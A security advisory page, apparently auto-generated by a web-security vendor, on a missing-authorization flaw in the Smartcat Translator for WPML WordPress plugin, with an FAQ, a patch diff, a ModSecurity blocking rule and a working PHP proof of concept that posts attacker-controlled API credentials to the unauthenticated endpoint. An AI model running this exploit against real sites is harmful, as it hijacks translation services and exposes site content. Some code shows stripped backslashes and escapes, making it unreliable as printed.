What is CVE-2026-4683?

CVE-2026-4683 is a medium-severity vulnerability in the Smartcat Translator for WPML plugin for WordPress. It is caused by a missing capability check on the ‘routeData’ REST endpoint, allowing unauthenticated attackers to overwrite sensitive Smartcat API credentials.

How does this vulnerability work?

The vulnerability allows attackers to send a POST request to the vulnerable REST endpoint ‘callback/credentials’ without authentication. This request can include arbitrary values for API credentials, which can overwrite legitimate settings and potentially hijack the translation service.

Who is affected by this vulnerability?

Any WordPress site using the Smartcat Translator for WPML plugin version 3.1.77 or earlier is affected. Administrators should check their installed plugin version to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Smartcat Translator for WPML plugin installed. If it is version 3.1.77 or earlier, your site is at risk and should be updated immediately.

What should I do to fix this vulnerability?

To mitigate this vulnerability, update the Smartcat Translator for WPML plugin to version 3.1.78 or later, where the issue has been patched. Ensure that your site is regularly updated to protect against future vulnerabilities.

What is the risk level of CVE-2026-4683?

CVE-2026-4683 has a CVSS score of 6.5, which is classified as medium severity. This indicates that while the vulnerability is not critical, it can still lead to significant issues such as unauthorized access to sensitive configuration data.

What practical impacts does this vulnerability have?

Successful exploitation of this vulnerability can allow attackers to take over the translation service, redirect translations to a malicious account, exfiltrate content, or cause a denial of service by using invalid credentials.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows how an attacker can send a POST request to the vulnerable endpoint with malicious API credentials. It illustrates the ease of exploiting the vulnerability without needing authentication, highlighting the security risk.

What changes were made in the patched version?

The patched version 3.1.78 removes the vulnerable ‘callback/credentials’ route entirely and adds checks to prevent direct file access. This ensures that unauthorized requests cannot modify sensitive settings.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, regularly update all plugins and themes, conduct security audits, and implement security best practices such as using strong authentication methods and monitoring for unauthorized changes.

Is there a way to monitor for exploitation attempts?

Yes, you can monitor for exploitation attempts by checking your server logs for unusual POST requests to the REST endpoint or by using security plugins that provide intrusion detection capabilities.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the Smartcat Translator for WPML plugin until a patch can be applied, or implement firewall rules to block access to the vulnerable endpoint.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 14, 2026

CVE-2026-4683: Smartcat Translator for WPML <= 3.1.77 – Missing Authorization to Unauthenticated Plugin Settings Update (smartcat-wpml)

CVE ID CVE-2026-4683

Plugin smartcat-wpml

Severity Medium (CVSS 6.5)

CWE 862

Vulnerable Version 3.1.77

Patched Version 3.1.78

Disclosed May 13, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4683:

This vulnerability allows unauthenticated attackers to overwrite Smartcat API credentials in the Smartcat Translator for WPML plugin up to version 3.1.77. The root cause is a missing capability check on the ‘routeData’ REST endpoint, which exposes routes including a callback for setting credentials. Atomic Edge research identified that the routes.php file defined a POST route ‘callback/credentials’ mapped to CallbackController::credentials(), without any permission verification. This endpoint accepts API credentials (account ID, secret key, hub key, API host, hub host) and stores them via the Options service. The patch in version 3.1.78 removes the entire callback route definition and adds direct file access checks (ABSPATH) across multiple files.

Exploitation requires sending a POST request to the REST endpoint defined by the plugin’s Router service. The vulnerable route ‘callback/credentials’ accepts parameters for API credentials. An attacker can call this endpoint with arbitrary credential values, overwriting the legitimate Smartcat connection settings. The attack does not require authentication or a valid nonce. Atomic Edge analysis confirms this is a straightforward unauthorized data modification attack.

The patch removes the ‘callback/credentials’ route from routes.php entirely and adds ABSPATH checks to prevent direct file access. The before state had a route: $router->route(‘POST’, ‘callback/credentials’, CallbackController::class, ‘credentials’);. The after state deletes this line, eliminating the unauthenticated endpoint. The patch also removes an unused import (CallbackController) and adds exit() guards on direct file access to autoload.php, config.php, functions.php, helpers.php, PluginLoader.php, AjaxHandler.php, SmartcatWpml.php, HTMLLinkProcessorTester.php, and workspace.php.

Successful exploitation lets an attacker take over the translation service by replacing Smartcat API credentials. This can redirect translations to a malicious Smartcat account, exfiltrate content, or cause a denial of service by using invalid credentials. The CVSS score is 6.5 (Medium), reflecting the unauthorized modification of sensitive configuration data without authentication.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/smartcat-wpml/autoload.php
+++ b/smartcat-wpml/autoload.php
@@ -1,5 +1,9 @@
 <?php

+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
 spl_autoload_register(function ($class) {
     $prefix = 'Smartcat\Includes\';
     $base_dir = __DIR__.'/includes/';
--- a/smartcat-wpml/config.php
+++ b/smartcat-wpml/config.php
@@ -1,5 +1,9 @@
 <?php

+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
 const SC_LOCAL_ENV = false;

 const SMARTCAT_API_PREFIX = 'smartcat';
--- a/smartcat-wpml/functions.php
+++ b/smartcat-wpml/functions.php
@@ -1,5 +1,9 @@
 <?php

+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
 use SmartcatIncludesServicesAPIHubClient;
 use SmartcatIncludesServicesAPISmartcatClient;
 use SmartcatIncludesServicesAppContentService;
--- a/smartcat-wpml/helpers.php
+++ b/smartcat-wpml/helpers.php
@@ -1,5 +1,9 @@
 <?php

+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
 use SmartcatIncludesPluginActivator;
 use SmartcatIncludesPluginDeactivator;
 use SmartcatIncludesSmartcatWpml;
--- a/smartcat-wpml/includes/Plugin/PluginLoader.php
+++ b/smartcat-wpml/includes/Plugin/PluginLoader.php
@@ -2,6 +2,10 @@

 namespace SmartcatIncludesPlugin;

+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
 class PluginLoader
 {
     protected $actions;
--- a/smartcat-wpml/includes/Services/Development/AjaxHandler.php
+++ b/smartcat-wpml/includes/Services/Development/AjaxHandler.php
@@ -4,6 +4,10 @@

 use SmartcatIncludesServicesWPMLHTMLLinkProcessorService;

+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
 /**
  * AJAX handler for development tools
  * Handles all AJAX requests related to development functionality
--- a/smartcat-wpml/includes/SmartcatWpml.php
+++ b/smartcat-wpml/includes/SmartcatWpml.php
@@ -11,6 +11,10 @@
 use SmartcatPubliclySmartcatPublic;
 use SmartcatAdmin;

+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
 class SmartcatWpml
 {
     protected $loader;
--- a/smartcat-wpml/includes/Views/Development/Components/HTMLLinkProcessorTester.php
+++ b/smartcat-wpml/includes/Views/Development/Components/HTMLLinkProcessorTester.php
@@ -4,6 +4,10 @@

 use SmartcatIncludesServicesWPMLHTMLLinkProcessorService;

+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
 /**
  * Component for testing HTMLLinkProcessorService functionality
  */
--- a/smartcat-wpml/includes/Views/Settings.php
+++ b/smartcat-wpml/includes/Views/Settings.php
@@ -6,7 +6,6 @@
 use SmartcatIncludesServicesPluginMigrations;
 use SmartcatIncludesServicesPluginOptions;
 use SmartcatIncludesViewsUIComponentsButton;
-use SmartcatIncludesViewsUIComponentsIcon;

 class Settings
 {
@@ -138,36 +137,9 @@
                     ->alignItemsCenter()
                     ->body(function () {
                         sc_ui()
-                            ->form()
-                            ->action(esc_url(admin_url('admin-post.php')))
-                            ->body(function () {
-                                sc_ui()
-                                    ->input()
-                                    ->type('hidden')
-                                    ->name('action')
-                                    ->value('smartcat_log_in')
-                                    ->render();
-
-                                sc_ui()
-                                    ->input()
-                                    ->type('hidden')
-                                    ->name('smartcat_update_options_nonce')
-                                    ->value(wp_create_nonce('smartcat_update_options_form_nonce'))
-                                    ->render();
-
-                                sc_ui()
-                                    ->button()
-                                    ->id('sc-connect-to-smartcat')
-                                    ->label('Connect to Smartcat')
-                                    ->icon(Icon::EXTERNAL)
-                                    ->render();
-                            })
-                            ->render();
-
-                        sc_ui()->button()
+                            ->button()
                             ->id('sc-authenticate-manually')
-                            ->style(Button::SIMPLE)
-                            ->label('Authenticate manually')
+                            ->label('Connect to Smartcat')
                             ->render();
                     });

@@ -491,7 +463,7 @@
             ->popup()
             ->id('sc-account-params-popup')
             ->classes('sc-account-params')
-            ->title('Authenticate manually')
+            ->title('Connect to Smartcat')
             ->actionButtonLabel('Authenticate')
             ->actionButtonId('sc-register-credentials-action')
             ->headLink('How does it work?', 'https://help.smartcat.com/integrations/wordpress-app')
--- a/smartcat-wpml/routes.php
+++ b/smartcat-wpml/routes.php
@@ -1,13 +1,13 @@
 <?php

-use SmartcatIncludesControllersCallbackController;
+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
 use SmartcatIncludesControllersPluginController;
 use SmartcatIncludesServicesPluginRouter;

 $router = new Router();

 //Plugin
-$router->route('POST', 'plugin/status', PluginController::class, 'status');
-
-// Callbacks
-$router->route('POST', 'callback/credentials', CallbackController::class, 'credentials');
+$router->route('POST', 'plugin/status', PluginController::class, 'status');
 No newline at end of file
--- a/smartcat-wpml/smartcat-wpml.php
+++ b/smartcat-wpml/smartcat-wpml.php
@@ -3,7 +3,7 @@
  * Plugin Name:       Smartcat Translator for WPML
  * Plugin URI:        https://smartcat.com
  * Description:       Smartcat Integration Add-on allows you to synchronize your site content for localization with Smartcat
- * Version:           3.1.77
+ * Version:           3.1.78
  * Author:            Smartcat
  * Author URI:        https://smartcat.com
  * License:           GPL-3.0
@@ -17,7 +17,7 @@

 define('SMARTCAT_WPML_PLUGIN_PATH', __FILE__);

-const SMARTCAT_WPML_VERSION = '3.1.77';
+const SMARTCAT_WPML_VERSION = '3.1.78';

 require_once __DIR__.'/config.php';
 require_once __DIR__.'/helpers.php';
--- a/smartcat-wpml/workspace.php
+++ b/smartcat-wpml/workspace.php
@@ -1,5 +1,9 @@
 <?php

+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
 const AUTOLOAD_PATH = __DIR__.'/vendor/autoload.php';
 const DD_HELPER_PATH = __DIR__.'/vendor/larapack/dd/src/helper.php';

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@rx /(?:wp-json/smartcat|?rest_route=/smartcat)/vd+/callback/credentials" 
  "id:20264683,phase:2,deny,status:403,chain,msg:'CVE-2026-4683 Smartcat Translator for WPML Unauthenticated API Credential Overwrite',severity:'CRITICAL',tag:'CVE-2026-4683',tag:'WordPress',tag:'Smartcat'"
  SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule ARGS_POST:apiSecretKey "@rx .+" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-4683 - Smartcat Translator for WPML <= 3.1.77 - Missing Authorization to Unauthenticated Plugin Settings Update

$target_url = 'http://example.com'; // Change this to the target WordPress site URL

// The vulnerable REST endpoint route was 'callback/credentials'
// The plugin uses a custom Router class, so we need to find the actual endpoint path
// Based on the code, routes are registered as: $router->route('POST', 'callback/credentials', ...)
// Common pattern for similar plugins: /wp-json/smartcat/v1/callback/credentials or /?rest_route=/smartcat/v1/callback/credentials
// We will try multiple possible endpoint patterns

$endpoints = [
    $target_url . '/index.php?rest_route=/smartcat/v1/callback/credentials',
    $target_url . '/?rest_route=/smartcat/v1/callback/credentials',
    $target_url . '/wp-json/smartcat/v1/callback/credentials',
];

// Attacker-controlled malicious API credentials
$malicious_credentials = [
    'accountId' => 'attacker_account_id',
    'apiSecretKey' => 'attacker_secret_key',
    'hubKey' => 'attacker_hub_key',
    'apiHost' => 'https://malicious.api.smartcat.com',
    'hubHost' => 'https://malicious.hub.smartcat.com',
];

$ch = curl_init();

foreach ($endpoints as $endpoint) {
    echo "[+] Trying endpoint: $endpointn";
    
    curl_setopt_array($ch, [
        CURLOPT_URL => $endpoint,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($malicious_credentials),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_HTTPHEADER => [
            'Content-Type: application/x-www-form-urlencoded',
            'X-Requested-With: XMLHttpRequest',
        ],
    ]);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    if ($http_code === 200) {
        echo "[+] SUCCESS! Endpoint responded with HTTP 200.n";
        echo "[+] Response: " . substr($response, 0, 500) . "n";
        echo "[+] Malicious credentials have been set. The Smartcat translation service is now hijacked.n";
        break;
    } else {
        echo "[-] HTTP $http_code - Endpoint did not respond as expected.n";
    }
}

curl_close($ch);

Frequently Asked Questions

What is CVE-2026-4683?
Overview of the vulnerability
CVE-2026-4683 is a medium-severity vulnerability in the Smartcat Translator for WPML plugin for WordPress. It is caused by a missing capability check on the ‘routeData’ REST endpoint, allowing unauthenticated attackers to overwrite sensitive Smartcat API credentials.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send a POST request to the vulnerable REST endpoint ‘callback/credentials’ without authentication. This request can include arbitrary values for API credentials, which can overwrite legitimate settings and potentially hijack the translation service.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Smartcat Translator for WPML plugin version 3.1.77 or earlier is affected. Administrators should check their installed plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Smartcat Translator for WPML plugin installed. If it is version 3.1.77 or earlier, your site is at risk and should be updated immediately.
What should I do to fix this vulnerability?
Recommended actions
To mitigate this vulnerability, update the Smartcat Translator for WPML plugin to version 3.1.78 or later, where the issue has been patched. Ensure that your site is regularly updated to protect against future vulnerabilities.
What is the risk level of CVE-2026-4683?
Understanding the severity
CVE-2026-4683 has a CVSS score of 6.5, which is classified as medium severity. This indicates that while the vulnerability is not critical, it can still lead to significant issues such as unauthorized access to sensitive configuration data.
What practical impacts does this vulnerability have?
Potential consequences
Successful exploitation of this vulnerability can allow attackers to take over the translation service, redirect translations to a malicious account, exfiltrate content, or cause a denial of service by using invalid credentials.
How does the proof of concept demonstrate the vulnerability?
Understanding the demonstration
The proof of concept provided shows how an attacker can send a POST request to the vulnerable endpoint with malicious API credentials. It illustrates the ease of exploiting the vulnerability without needing authentication, highlighting the security risk.
What changes were made in the patched version?
Details of the fix
The patched version 3.1.78 removes the vulnerable ‘callback/credentials’ route entirely and adds checks to prevent direct file access. This ensures that unauthorized requests cannot modify sensitive settings.
How can I prevent similar vulnerabilities in the future?
Best practices for security
To prevent similar vulnerabilities, regularly update all plugins and themes, conduct security audits, and implement security best practices such as using strong authentication methods and monitoring for unauthorized changes.
Is there a way to monitor for exploitation attempts?
Monitoring strategies
Yes, you can monitor for exploitation attempts by checking your server logs for unusual POST requests to the REST endpoint or by using security plugins that provide intrusion detection capabilities.
What should I do if I cannot update the plugin immediately?
Interim measures
If you cannot update the plugin immediately, consider disabling the Smartcat Translator for WPML plugin until a patch can be applied, or implement firewall rules to block access to the vulnerable endpoint.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations